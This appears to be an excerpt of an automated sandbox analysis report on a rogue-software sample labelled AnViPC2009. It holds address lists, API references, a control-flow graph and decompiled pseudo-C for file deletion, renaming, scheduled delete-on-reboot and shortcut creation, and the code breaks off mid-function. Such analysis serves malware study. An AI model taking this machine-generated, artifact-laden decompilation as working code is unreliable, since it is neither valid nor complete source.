                                                                                                                                                      0x0040227a
                                                                                                                                                      0x0040227c
                                                                                                                                                      0x0040227e
                                                                                                                                                      0x00402280
                                                                                                                                                      0x00402280
                                                                                                                                                      0x00402280
                                                                                                                                                      0x00402280
                                                                                                                                                      0x00402283
                                                                                                                                                      0x00402289
                                                                                                                                                      0x0040228a
                                                                                                                                                      0x0040228a
                                                                                                                                                      0x0040228c
                                                                                                                                                      0x004022b2
                                                                                                                                                      0x004022bb
                                                                                                                                                      0x004022bf
                                                                                                                                                      0x004022bf
                                                                                                                                                      0x004022c1
                                                                                                                                                      0x0040228e
                                                                                                                                                      0x00402290
                                                                                                                                                      0x00402290
                                                                                                                                                      0x00402293
                                                                                                                                                      0x00402295
                                                                                                                                                      0x0040229c
                                                                                                                                                      0x004022a7
                                                                                                                                                      0x004022a9
                                                                                                                                                      0x004022ac
                                                                                                                                                      0x004022af
                                                                                                                                                      0x004022af
                                                                                                                                                      0x004022af
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00402295
                                                                                                                                                      0x004022c4
                                                                                                                                                      0x004022c4
                                                                                                                                                      0x004022c7
                                                                                                                                                      0x004022cb
                                                                                                                                                      0x004022cb
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00402237
                                                                                                                                                      0x004021f7
                                                                                                                                                      0x00401e88
                                                                                                                                                      0x00401e88
                                                                                                                                                      0x00401e8b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401e8d
                                                                                                                                                      0x00401e8d
                                                                                                                                                      0x00401e8e
                                                                                                                                                      0x00401ecb
                                                                                                                                                      0x00401ecc
                                                                                                                                                      0x00401ecd
                                                                                                                                                      0x00401ece
                                                                                                                                                      0x00401ed4
                                                                                                                                                      0x00401ed7
                                                                                                                                                      0x00401ee3
                                                                                                                                                      0x00401ee3
                                                                                                                                                      0x00401ee8
                                                                                                                                                      0x00401eeb
                                                                                                                                                      0x00401efb
                                                                                                                                                      0x00401efb
                                                                                                                                                      0x00401e90
                                                                                                                                                      0x00401e95
                                                                                                                                                      0x00401e98
                                                                                                                                                      0x00401ea5
                                                                                                                                                      0x00401ead
                                                                                                                                                      0x00401eb3
                                                                                                                                                      0x00401eb3
                                                                                                                                                      0x00401e98
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401e8e
                                                                                                                                                      0x00401e8b
                                                                                                                                                      0x00401e44
                                                                                                                                                      0x00401e47
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401e47
                                                                                                                                                      0x00401e3b
                                                                                                                                                      0x00401e3b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401dff
                                                                                                                                                      0x00401e10
                                                                                                                                                      0x00401e1f
                                                                                                                                                      0x00401e26
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401e26
                                                                                                                                                      0x00401dfd
                                                                                                                                                      0x00401cdc
                                                                                                                                                      0x00401ce4
                                                                                                                                                      0x00401ce7
                                                                                                                                                      0x00401ce9
                                                                                                                                                      0x00401ceb
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401cf9
                                                                                                                                                      0x00401cfb
                                                                                                                                                      0x00401d04
                                                                                                                                                      0x00401d10
                                                                                                                                                      0x00401d3a
                                                                                                                                                      0x00401d3f
                                                                                                                                                      0x00401d42
                                                                                                                                                      0x00401d50
                                                                                                                                                      0x00401d55
                                                                                                                                                      0x00401d57
                                                                                                                                                      0x00401d5b
                                                                                                                                                      0x00401d6a
                                                                                                                                                      0x00401d6a
                                                                                                                                                      0x00401d57
                                                                                                                                                      0x00401d6f
                                                                                                                                                      0x00401d76
                                                                                                                                                      0x00401d7c
                                                                                                                                                      0x00401d8f
                                                                                                                                                      0x00401d97
                                                                                                                                                      0x00401d9c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401d9c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401d10

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00404FA3: SetFilePointer.KERNELBASE(00020000,00000000,00000000,00000001,?,?,?,?,0040A7D3,?,?,00405524,?,?), ref: 00404FBA
                                                                                                                                                        • Part of subcall function 00404FA3: GetLastError.KERNEL32(?,0040A7D3,?,?,00405524,?,?), ref: 00404FC7
                                                                                                                                                        • Part of subcall function 0040E1E9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000,00000000,?,?,0040515F,?,?,01000000,?), ref: 0040E203
                                                                                                                                                      • CharToOemA.USER32 ref: 00402165
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Char$ByteErrorFileLastMultiPointerWide
                                                                                                                                                      • String ID: - ???$???$|LA$|LA$|LA$|LA
                                                                                                                                                      • API String ID: 1784729808-3627379113
                                                                                                                                                      • Opcode ID: 0ae667f308ce3594e004c6c1a57aba8cd37a35e2631e99bb349059da5303d4f6
                                                                                                                                                      • Instruction ID: 577cc1d17dabae46a3fbc48cbcf6cd12d1d297fcd7da7c9c8a2f67ec11cd559e
                                                                                                                                                      • Opcode Fuzzy Hash: 0ae667f308ce3594e004c6c1a57aba8cd37a35e2631e99bb349059da5303d4f6
                                                                                                                                                      • Instruction Fuzzy Hash: 2D32C1719002049BDF14DFA5C985AEEB7B9AF40304F14017FF946BB2D2EB786A44CB68
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 1203 40c770-40c774 1204 40c77a-40c78a call 40a229 1203->1204 1205 40ca0c-40ca34 call 40b5ec 1203->1205 1211 40c78c-40c78f 1204->1211 1212 40c7af 1204->1212 1213 40bfba-40bfda 1205->1213 1214 40ca3a-40ca3e 1205->1214 1215 40c791-40c792 1211->1215 1216 40c7a6-40c7ad 1211->1216 1217 40c7b6-40c7de call 40a450 1212->1217 1219 40bfe1-40bff4 call 40a8fe 1213->1219 1220 40c794-40c79b 1215->1220 1221 40c79d-40c7a4 1215->1221 1216->1217 1227 40c7e0-40c803 call 40a450 call 407384 1217->1227 1228 40c81f-40c82f call 40572e 1217->1228 1230 40bff6 1219->1230 1220->1217 1221->1217 1237 40c8a2-40c8a9 1227->1237 1246 40c809-40c81a call 40a450 1227->1246 1236 40c831-40c840 1228->1236 1228->1237 1234 40bffa-40c013 lstrcmpiA 1230->1234 1238 40c023-40c027 1234->1238 1239 40c015-40c01c 1234->1239 1236->1237 1241 40c842-40c847 1236->1241 1242 40c8ab-40c8b9 call 4057e4 1237->1242 1243 40c8be-40c8f3 call 4057e4 call 40aa9b call 4076a1 1237->1243 1238->1205 1245 40c02d-40c030 1238->1245 1239->1234 1244 40c01e 1239->1244 1247 40c849-40c84c 1241->1247 1248 40c84e-40c861 call 40572e 1241->1248 1242->1243 1299 40c914-40c934 call 40a450 1243->1299 1300 40c8f5-40c90f call 40a5bb call 4076a1 1243->1300 1244->1205 1251 40c037-40c03b 1245->1251 1252 40c2ec-40c2f0 1245->1252 1253 40c2cd-40c2d1 1245->1253 1254 40c23f-40c243 1245->1254 1246->1237 1247->1248 1260 40c895-40c899 1247->1260 1279 40c893 1248->1279 1280 40c863-40c868 1248->1280 1251->1205 1255 40c041-40c0c3 GetCurrentDirectoryA call 40a450 call 4076a1 call 40a5bb call 405b6f call 405b9f call 403517 call 405f6f 1251->1255 1252->1205 1257 40c2f6-40c2fd 1252->1257 1253->1205 1256 40c2d7-40c2e7 SetWindowTextA 1253->1256 1254->1205 1259 40c249-40c255 1254->1259 1370 40c0c9 1255->1370 1371 40c22f-40c23a call 405b8c 1255->1371 1256->1205 1257->1205 1265 40c303-40c317 1257->1265 1267 40c262-40c266 1259->1267 1268 40c257-40c25d call 40a5bb 1259->1268 1260->1241 1269 40c89b-40c89d 1260->1269 1273 40c319 1265->1273 1274 40c31f-40c32a call 40a35d 1265->1274 1277 40c270-40c278 call 40b793 1267->1277 1278 40c268-40c26e 1267->1278 1268->1267 1269->1237 1276 40c89f 1269->1276 1273->1274 1274->1205 1302 40c330-40c334 1274->1302 1276->1237 1286 40c27a-40c27c 1277->1286 1278->1286 1279->1260 1281 40c86a-40c87a 1280->1281 1282 40c87c-40c880 1280->1282 1290 40c889-40c891 call 40a450 1281->1290 1282->1282 1291 40c882-40c883 1282->1291 1288 40c282-40c28d call 40a35d 1286->1288 1289 40c27e-40c280 1286->1289 1296 40c28f-40c2ac call 40a35d call 40a1fd 1288->1296 1289->1296 1290->1260 1291->1290 1334 40c2b1-40c2bc call 40a5bb 1296->1334 1335 40c2ae 1296->1335 1321 40c936 1299->1321 1322 40c93c-40c95d call 4073b4 call 40a5bb call 407669 1299->1322 1300->1299 1309 40c3ea-40c3ec 1302->1309 1310 40c33a-40c33e 1302->1310 1316 40c350-40c358 call 40a450 1309->1316 1317 40c3f2-40c3f4 1309->1317 1310->1309 1315 40c344-40c34a 1310->1315 1315->1205 1315->1316 1329 40c35d-40c36d call 40a3b2 1316->1329 1324 40c400-40c41a RegOpenKeyExA 1317->1324 1325 40c3f6-40c3fa 1317->1325 1321->1322 1365 40c96e-40c97a call 40a5bb 1322->1365 1366 40c95f-40c96c call 40a573 1322->1366 1330 40c44b-40c452 1324->1330 1331 40c41c-40c445 RegQueryValueExA RegCloseKey 1324->1331 1325->1316 1325->1324 1346 40c378-40c3c3 call 40a450 call 40b989 GetDlgItem SetWindowTextA SendMessageA call 40a4c2 1329->1346 1347 40c36f-40c373 1329->1347 1332 40c454-40c46b call 40a35d 1330->1332 1333 40c47e-40c49a call 40a35d * 2 1330->1333 1331->1330 1332->1333 1355 40c46d-40c479 call 40a5bb 1332->1355 1333->1329 1368 40c4a0-40c4ad call 40a5bb 1333->1368 1334->1205 1357 40c2c2-40c2c8 call 40a1de 1334->1357 1335->1334 1389 40c3c8-40c3ca 1346->1389 1347->1346 1353 40c375 1347->1353 1353->1346 1355->1333 1357->1205 1382 40c97f-40c9e5 call 4058c1 call 40a996 1365->1382 1366->1365 1366->1382 1368->1205 1368->1329 1372 40c0ce-40c0e4 SetFileAttributesA 1370->1372 1371->1205 1378 40c194-40c1a0 GetFileAttributesA 1372->1378 1379 40c0ea-40c0f2 call 406e67 1372->1379 1386 40c1a2-40c1b1 DeleteFileA 1378->1386 1387 40c213-40c229 call 405f6f 1378->1387 1379->1378 1396 40c0f8-40c129 call 4072d9 call 4076a1 call 40a35d 1379->1396 1382->1205 1405 40c9e7-40c9fd SHChangeNotify 1382->1405 1386->1387 1392 40c1b3-40c1b7 1386->1392 1387->1371 1387->1372 1389->1205 1394 40c3d0-40c3e5 SendMessageA 1389->1394 1397 40c1bf-40c1df wsprintfA GetFileAttributesA 1392->1397 1394->1205 1413 40c12b-40c13a call 40a35d 1396->1413 1414 40c13c-40c14c call 407252 1396->1414 1400 40c1e1-40c1f7 MoveFileA 1397->1400 1401 40c1b9-40c1bc 1397->1401 1400->1387 1404 40c1f9-40c200 call 406e67 1400->1404 1401->1397 1404->1387 1411 40c202-40c20d MoveFileExA 1404->1411 1405->1205 1411->1387 1413->1414 1419 40c152-40c18e call 40a35d call 40a262 SHFileOperationA 1413->1419 1414->1371 1414->1419 1419->1378
                                                                                                                                                      C-Code - Quality: 87%
                                                                                                                                                      			E0040C770(void* __ecx, void* __esi) {
                                                                                                                                                      				void* _t230;
                                                                                                                                                      				intOrPtr _t231;
                                                                                                                                                      				void* _t232;
                                                                                                                                                      				void* _t306;
                                                                                                                                                      				void* _t308;
                                                                                                                                                      
                                                                                                                                                      				L0:
                                                                                                                                                      				while(1) {
                                                                                                                                                      					L0:
                                                                                                                                                      					_t306 = __esi;
                                                                                                                                                      					if( *((intOrPtr*)(_t308 + 0x10)) != 6) {
                                                                                                                                                      						goto L152;
                                                                                                                                                      					}
                                                                                                                                                      					L115:
                                                                                                                                                      					__eax =  *((char*)(__ebp - 0xb4dc));
                                                                                                                                                      					__eax = E0040A229(__ecx,  *((char*)(__ebp - 0xb4dc)));
                                                                                                                                                      					__eax = __eax - 0x50;
                                                                                                                                                      					__eflags = __eax;
                                                                                                                                                      					if(__eax == 0) {
                                                                                                                                                      						 *(__ebp - 4) = 2;
                                                                                                                                                      					} else {
                                                                                                                                                      						__eax = __eax - 3;
                                                                                                                                                      						__eflags = __eax;
                                                                                                                                                      						if(__eax == 0) {
                                                                                                                                                      							 *(__ebp - 4) = 0xb;
                                                                                                                                                      						} else {
                                                                                                                                                      							__eax = __eax - 1;
                                                                                                                                                      							__eflags = __eax;
                                                                                                                                                      							if(__eax == 0) {
                                                                                                                                                      								 *(__ebp - 4) = 7;
                                                                                                                                                      							} else {
                                                                                                                                                      								 *(__ebp - 4) = 0x10;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					__ebp - 0xa4dc = __ebp - 0xc34;
                                                                                                                                                      					 *(__ebp - 0x2034) = 0;
                                                                                                                                                      					 *(__ebp - 0x834) = 0;
                                                                                                                                                      					__eax = E0040A450(__ebp - 0xc34, __ebp - 0xa4dc);
                                                                                                                                                      					__eflags =  *(__ebp - 0xc34) - 0x22;
                                                                                                                                                      					if(__eflags != 0) {
                                                                                                                                                      						L125:
                                                                                                                                                      						__ebp - 0xc34 = E0040572E(__eflags, __ebp - 0xc34, 0);
                                                                                                                                                      						__eflags = __al;
                                                                                                                                                      						if(__al != 0) {
                                                                                                                                                      							goto L139;
                                                                                                                                                      						}
                                                                                                                                                      						L126:
                                                                                                                                                      						__edi = 0;
                                                                                                                                                      						__eflags =  *(__ebp - 0xc34);
                                                                                                                                                      						__esi = __ebp - 0xc34;
                                                                                                                                                      						if( *(__ebp - 0xc34) == 0) {
                                                                                                                                                      							goto L139;
                                                                                                                                                      						} else {
                                                                                                                                                      							goto L127;
                                                                                                                                                      						}
                                                                                                                                                      						do {
                                                                                                                                                      							L127:
                                                                                                                                                      							__bl = __esi->i;
                                                                                                                                                      							__eflags = __bl - 0x20;
                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                      								L129:
                                                                                                                                                      								__eax = __ebp - 0xc34;
                                                                                                                                                      								__esi->i = 0;
                                                                                                                                                      								__eax = E0040572E(__eflags, __ebp - 0xc34, 0);
                                                                                                                                                      								__eflags = __al;
                                                                                                                                                      								if(__al == 0) {
                                                                                                                                                      									L135:
                                                                                                                                                      									__esi->i = __bl;
                                                                                                                                                      									goto L136;
                                                                                                                                                      								}
                                                                                                                                                      								L130:
                                                                                                                                                      								__edi = __esi;
                                                                                                                                                      								__eflags = __bl - 0x2f;
                                                                                                                                                      								if(__bl != 0x2f) {
                                                                                                                                                      									do {
                                                                                                                                                      										L132:
                                                                                                                                                      										__esi =  &(__esi->i);
                                                                                                                                                      										__eflags = __esi->i - 0x20;
                                                                                                                                                      									} while (__esi->i == 0x20);
                                                                                                                                                      									_push(__esi);
                                                                                                                                                      									__eax = __ebp - 0x834;
                                                                                                                                                      									L134:
                                                                                                                                                      									_push(__eax);
                                                                                                                                                      									__eax = E0040A450();
                                                                                                                                                      									 *__edi = __bl;
                                                                                                                                                      									goto L136;
                                                                                                                                                      								}
                                                                                                                                                      								L131:
                                                                                                                                                      								_t185 =  &(__esi->i); // 0x1
                                                                                                                                                      								__eax = _t185;
                                                                                                                                                      								_push(_t185);
                                                                                                                                                      								 *(__ebp - 0x834) = __bl;
                                                                                                                                                      								__eax = __ebp - 0x833;
                                                                                                                                                      								goto L134;
                                                                                                                                                      							}
                                                                                                                                                      							L128:
                                                                                                                                                      							__eflags = __bl - 0x2f;
                                                                                                                                                      							if(__eflags != 0) {
                                                                                                                                                      								goto L136;
                                                                                                                                                      							}
                                                                                                                                                      							goto L129;
                                                                                                                                                      							L136:
                                                                                                                                                      							__esi =  &(__esi->i);
                                                                                                                                                      							__eflags = __esi->i;
                                                                                                                                                      						} while (__esi->i != 0);
                                                                                                                                                      						__eflags = __edi;
                                                                                                                                                      						if(__edi != 0) {
                                                                                                                                                      							 *__edi = 0;
                                                                                                                                                      						}
                                                                                                                                                      						goto L139;
                                                                                                                                                      					} else {
                                                                                                                                                      						L123:
                                                                                                                                                      						__ebp - 0xa4db = __ebp - 0xc34;
                                                                                                                                                      						E0040A450(__ebp - 0xc34, __ebp - 0xa4db) = __ebp - 0xc33;
                                                                                                                                                      						__eax = E00407384(__ebp - 0xc33, 0x22);
                                                                                                                                                      						__eflags = __eax;
                                                                                                                                                      						if(__eax != 0) {
                                                                                                                                                      							 *__eax = 0;
                                                                                                                                                      							__ebp - 0x834 = E0040A450(__ebp - 0x834, __ebp - 0x834);
                                                                                                                                                      						}
                                                                                                                                                      						L139:
                                                                                                                                                      						__eflags =  *((char*)(__ebp - 0x64dc));
                                                                                                                                                      						if( *((char*)(__ebp - 0x64dc)) != 0) {
                                                                                                                                                      							__ebp - 0x2034 = __ebp - 0x64dc;
                                                                                                                                                      							__eax = E004057E4(__ebp - 0x64dc, __ebp - 0x2034);
                                                                                                                                                      						}
                                                                                                                                                      						__ebp - 0x44dc = __ebp - 0xc34;
                                                                                                                                                      						E004057E4(__ebp - 0xc34, __ebp - 0x44dc) = __ebp - 0x434;
                                                                                                                                                      						__eax = E0040AA9B(__ecx, __ebp - 0x434,  *(__ebp - 4)); // executed
                                                                                                                                                      						__ebp - 0x434 = E004076A1(__ebp - 0x434);
                                                                                                                                                      						__eflags =  *((char*)(__ebp - 0x94dc));
                                                                                                                                                      						if( *((char*)(__ebp - 0x94dc)) != 0) {
                                                                                                                                                      							__ebp - 0x94dc = __ebp - 0x434;
                                                                                                                                                      							E0040A5BB(__ebp - 0x434, __ebp - 0x94dc) = __ebp - 0x434;
                                                                                                                                                      							__eax = E004076A1(__ebp - 0x434);
                                                                                                                                                      						}
                                                                                                                                                      						__ebp - 0x434 = __ebp - 0x34d4;
                                                                                                                                                      						__eax = E0040A450(__ebp - 0x34d4, __ebp - 0x434);
                                                                                                                                                      						__eflags =  *(__ebp - 0x74dc);
                                                                                                                                                      						__eax = __ebp - 0x74dc;
                                                                                                                                                      						if( *(__ebp - 0x74dc) == 0) {
                                                                                                                                                      							__eax = __ebp - 0xa4dc;
                                                                                                                                                      						}
                                                                                                                                                      						__ebp - 0x434 = E0040A5BB(__ebp - 0x434, __ebp - 0x434);
                                                                                                                                                      						__eax = __ebp - 0x434;
                                                                                                                                                      						__eax = E00407669(__ebp - 0x434);
                                                                                                                                                      						__eflags = __eax;
                                                                                                                                                      						if(__eax == 0) {
                                                                                                                                                      							L147:
                                                                                                                                                      							__ebp - 0x434 = E0040A5BB(__ebp - 0x434, ".lnk");
                                                                                                                                                      							goto L148;
                                                                                                                                                      						} else {
                                                                                                                                                      							L146:
                                                                                                                                                      							__eax = E0040A573(__eax, ".lnk");
                                                                                                                                                      							__eflags = __eax;
                                                                                                                                                      							if(__eax == 0) {
                                                                                                                                                      								L148:
                                                                                                                                                      								__ebp - 0x434 = E004058C1(__ebx, __esi, __ebp - 0x434, 0, 1); // executed
                                                                                                                                                      								 *(__ebp - 0x834) =  ~( *(__ebp - 0x834));
                                                                                                                                                      								asm("sbb eax, eax");
                                                                                                                                                      								__ecx = __ebp - 0x834;
                                                                                                                                                      								 ~( *(__ebp - 0x834)) & __ebp - 0x00000834 =  *(__ebp - 0x2034);
                                                                                                                                                      								__eax =  ~( *(__ebp - 0x2034));
                                                                                                                                                      								asm("sbb eax, eax");
                                                                                                                                                      								__ecx = __ebp - 0x2034;
                                                                                                                                                      								 ~( *(__ebp - 0x2034)) & __ebp - 0x00002034 =  *(__ebp - 0x84dc);
                                                                                                                                                      								__eax =  ~( *(__ebp - 0x84dc));
                                                                                                                                                      								asm("sbb eax, eax");
                                                                                                                                                      								__ecx = __ebp - 0x84dc;
                                                                                                                                                      								 ~( *(__ebp - 0x84dc)) & __ebp - 0x000084dc = __ebp - 0x434;
                                                                                                                                                      								__ebp - 0x44dc = E0040A996(__ebp - 0x44dc, __ebp - 0x434,  ~( *(__ebp - 0x84dc)) & __ebp - 0x000084dc,  ~( *(__ebp - 0x2034)) & __ebp - 0x00002034,  ~( *(__ebp - 0x834)) & __ebp - 0x00000834); // executed
                                                                                                                                                      								__eflags =  *(__ebp - 0x34d4);
                                                                                                                                                      								if( *(__ebp - 0x34d4) != 0) {
                                                                                                                                                      									__eax = __ebp - 0x34d4;
                                                                                                                                                      									SHChangeNotify(0x1000, 1, __ebp - 0x34d4, 0); // executed
                                                                                                                                                      								}
                                                                                                                                                      								while(1) {
                                                                                                                                                      									L152:
                                                                                                                                                      									_t230 = _t308 - 0x54dc;
                                                                                                                                                      									_t231 = E0040B5EC(0x1000, _t306);
                                                                                                                                                      									 *((intOrPtr*)(_t308 + 0xc)) = _t231;
                                                                                                                                                      									asm("ror byte [edi], 0x85");
                                                                                                                                                      									[far dword [esi+0x5b]( *((intOrPtr*)(_t308 + 0xc)), _t230, _t308 - 0x1c34, _t308 - 5, _t308 + 0xf);
                                                                                                                                                      									_t306 = GetFileAttributesA;
                                                                                                                                                      									_t232 = _t308 - 0x1c34;
                                                                                                                                                      									 *(_t308 - 4) = _t308 - 0xb4dc;
                                                                                                                                                      									 *((intOrPtr*)(_t308 - 0xc)) = 6;
                                                                                                                                                      									goto L2;
                                                                                                                                                      									L4:
                                                                                                                                                      									while(lstrcmpiA(_t308 - 0x54dc,  *(0x4140b8 +  *(_t308 - 4) * 4)) != 0) {
                                                                                                                                                      										 *(_t308 - 4) =  *(_t308 - 4) + 1;
                                                                                                                                                      										if( *(_t308 - 4) < 0xd) {
                                                                                                                                                      											continue;
                                                                                                                                                      										} else {
                                                                                                                                                      											goto L152;
                                                                                                                                                      										}
                                                                                                                                                      									}
                                                                                                                                                      									__eflags =  *(_t308 - 4) - 0xc;
                                                                                                                                                      									if( *(_t308 - 4) > 0xc) {
                                                                                                                                                      										continue;
                                                                                                                                                      									}
                                                                                                                                                      									L8:
                                                                                                                                                      									switch( *((intOrPtr*)( *(_t308 - 4) * 4 +  &M0040CA42))) {
                                                                                                                                                      										case 0:
                                                                                                                                                      											L9:
                                                                                                                                                      											__eflags =  *((intOrPtr*)(_t308 + 0x10)) - 2;
                                                                                                                                                      											if( *((intOrPtr*)(_t308 + 0x10)) != 2) {
                                                                                                                                                      												goto L152;
                                                                                                                                                      											}
                                                                                                                                                      											L10:
                                                                                                                                                      											GetCurrentDirectoryA(0x400, _t308 - 0x434);
                                                                                                                                                      											E0040A450(_t308 - 0xc34, _t308 - 0x434);
                                                                                                                                                      											E004076A1(_t308 - 0xc34);
                                                                                                                                                      											E0040A5BB(_t308 - 0xc34, _t308 - 0x1c34);
                                                                                                                                                      											E00405B6F(_t308 - 0x40dc);
                                                                                                                                                      											E00405B9F(_t308 - 0x40dc, _t308 - 0xc34);
                                                                                                                                                      											E00403517(_t308 - 0x30d4);
                                                                                                                                                      											_push(0);
                                                                                                                                                      											_t301 = _t308 - 0x40dc;
                                                                                                                                                      											_t252 = E00405F6F(_t308 - 0x40dc, _t302, _t308 - 0x30d4);
                                                                                                                                                      											__eflags = _t252;
                                                                                                                                                      											if(_t252 == 0) {
                                                                                                                                                      												L27:
                                                                                                                                                      												E00405B8C(_t308 - 0x40dc);
                                                                                                                                                      												goto L152;
                                                                                                                                                      											} else {
                                                                                                                                                      												_t295 = "%s.%d.tmp";
                                                                                                                                                      												do {
                                                                                                                                                      													L12:
                                                                                                                                                      													SetFileAttributesA(_t308 - 0x30d4, 0);
                                                                                                                                                      													__eflags =  *((char*)(_t308 - 0x24c4));
                                                                                                                                                      													if( *((char*)(_t308 - 0x24c4)) == 0) {
                                                                                                                                                      														L18:
                                                                                                                                                      														_t257 = GetFileAttributesA(_t308 - 0x30d4);
                                                                                                                                                      														__eflags = _t257 - 0xffffffff;
                                                                                                                                                      														if(_t257 == 0xffffffff) {
                                                                                                                                                      															goto L26;
                                                                                                                                                      														}
                                                                                                                                                      														L19:
                                                                                                                                                      														_t261 = DeleteFileA(_t308 - 0x30d4);
                                                                                                                                                      														__eflags = _t261;
                                                                                                                                                      														if(_t261 != 0) {
                                                                                                                                                      															goto L26;
                                                                                                                                                      														} else {
                                                                                                                                                      															 *(_t308 - 4) =  *(_t308 - 4) & _t261;
                                                                                                                                                      															_push(_t261);
                                                                                                                                                      															goto L22;
                                                                                                                                                      															L22:
                                                                                                                                                      															wsprintfA(_t308 - 0x834, _t295, _t308 - 0x30d4);
                                                                                                                                                      															_t310 = _t310 + 0x10;
                                                                                                                                                      															_t266 = GetFileAttributesA(_t308 - 0x834);
                                                                                                                                                      															__eflags = _t266 - 0xffffffff;
                                                                                                                                                      															if(_t266 != 0xffffffff) {
                                                                                                                                                      																_t60 = _t308 - 4;
                                                                                                                                                      																 *_t60 =  *(_t308 - 4) + 1;
                                                                                                                                                      																__eflags =  *_t60;
                                                                                                                                                      																_push( *(_t308 - 4));
                                                                                                                                                      																goto L22;
                                                                                                                                                      															} else {
                                                                                                                                                      																_t269 = MoveFileA(_t308 - 0x30d4, _t308 - 0x834);
                                                                                                                                                      																__eflags = _t269;
                                                                                                                                                      																if(_t269 != 0) {
                                                                                                                                                      																	_t270 = E00406E67();
                                                                                                                                                      																	__eflags = _t270;
                                                                                                                                                      																	if(_t270 != 0) {
                                                                                                                                                      																		MoveFileExA(_t308 - 0x834, 0, 4);
                                                                                                                                                      																	}
                                                                                                                                                      																}
                                                                                                                                                      																goto L26;
                                                                                                                                                      															}
                                                                                                                                                      														}
                                                                                                                                                      													}
                                                                                                                                                      													L13:
                                                                                                                                                      													__eflags = E00406E67() - 4;
                                                                                                                                                      													if(__eflags == 0) {
                                                                                                                                                      														goto L18;
                                                                                                                                                      													}
                                                                                                                                                      													L14:
                                                                                                                                                      													E004072D9(_t301, __eflags, _t308 - 0x434, _t308 - 0x2034);
                                                                                                                                                      													E004076A1(_t308 - 0x2034);
                                                                                                                                                      													_t280 = E0040A35D(_t301, _t308 - 0x434);
                                                                                                                                                      													 *((intOrPtr*)(_t308 - 0xc)) = _t280;
                                                                                                                                                      													__eflags = _t280 - 4;
                                                                                                                                                      													if(_t280 < 4) {
                                                                                                                                                      														L16:
                                                                                                                                                      														_t282 = E00407252(_t301, _t308 - 0x1c34, 0);
                                                                                                                                                      														__eflags = _t282;
                                                                                                                                                      														if(_t282 != 0) {
                                                                                                                                                      															goto L27;
                                                                                                                                                      														}
                                                                                                                                                      														L17:
                                                                                                                                                      														 *((char*)(_t308 + E0040A35D(_t301, _t308 - 0x30d4) - 0x30d3)) = 0;
                                                                                                                                                      														E0040A262(_t301, _t308 - 0x34, 0, 0x1e);
                                                                                                                                                      														_push(0x14);
                                                                                                                                                      														_pop(_t287);
                                                                                                                                                      														 *((short*)(_t308 - 0x24)) = _t287;
                                                                                                                                                      														 *((intOrPtr*)(_t308 - 0x2c)) = _t308 - 0x30d4;
                                                                                                                                                      														 *((intOrPtr*)(_t308 - 0x30)) = 3;
                                                                                                                                                      														SHFileOperationA(_t308 - 0x34);
                                                                                                                                                      														goto L18;
                                                                                                                                                      													}
                                                                                                                                                      													L15:
                                                                                                                                                      													_t292 = E0040A35D(_t301, _t308 - 0x2034);
                                                                                                                                                      													__eflags =  *((intOrPtr*)(_t308 - 0xc)) - _t292;
                                                                                                                                                      													if( *((intOrPtr*)(_t308 - 0xc)) > _t292) {
                                                                                                                                                      														goto L17;
                                                                                                                                                      													}
                                                                                                                                                      													goto L16;
                                                                                                                                                      													L26:
                                                                                                                                                      													_push(0);
                                                                                                                                                      													_t301 = _t308 - 0x40dc;
                                                                                                                                                      													_t259 = E00405F6F(_t308 - 0x40dc, _t302, _t308 - 0x30d4);
                                                                                                                                                      													__eflags = _t259;
                                                                                                                                                      												} while (_t259 != 0);
                                                                                                                                                      												goto L27;
                                                                                                                                                      											}
                                                                                                                                                      										case 1:
                                                                                                                                                      											L28:
                                                                                                                                                      											__eflags =  *(__ebp + 0x10);
                                                                                                                                                      											if( *(__ebp + 0x10) == 0) {
                                                                                                                                                      												__eflags =  *((char*)(__ebp - 5));
                                                                                                                                                      												if(__eflags == 0) {
                                                                                                                                                      													__esi = __ebp + 0xc;
                                                                                                                                                      													__edi = E0040B793(__ebp + 0xc, __eflags);
                                                                                                                                                      												} else {
                                                                                                                                                      													__edi = __ebp - 0x1c34;
                                                                                                                                                      												}
                                                                                                                                                      												__eflags = __bl;
                                                                                                                                                      												if(__bl == 0) {
                                                                                                                                                      													__esi = E0040A35D(__ecx,  *0x41a81c);
                                                                                                                                                      												} else {
                                                                                                                                                      													__esi = 0;
                                                                                                                                                      												}
                                                                                                                                                      												E0040A35D(__ecx, __edi) = __eax + __esi + 5;
                                                                                                                                                      												__eax = E0040A1FD( *0x41a81c, __eax);
                                                                                                                                                      												 *0x41a81c = __eax;
                                                                                                                                                      												__eflags = __bl;
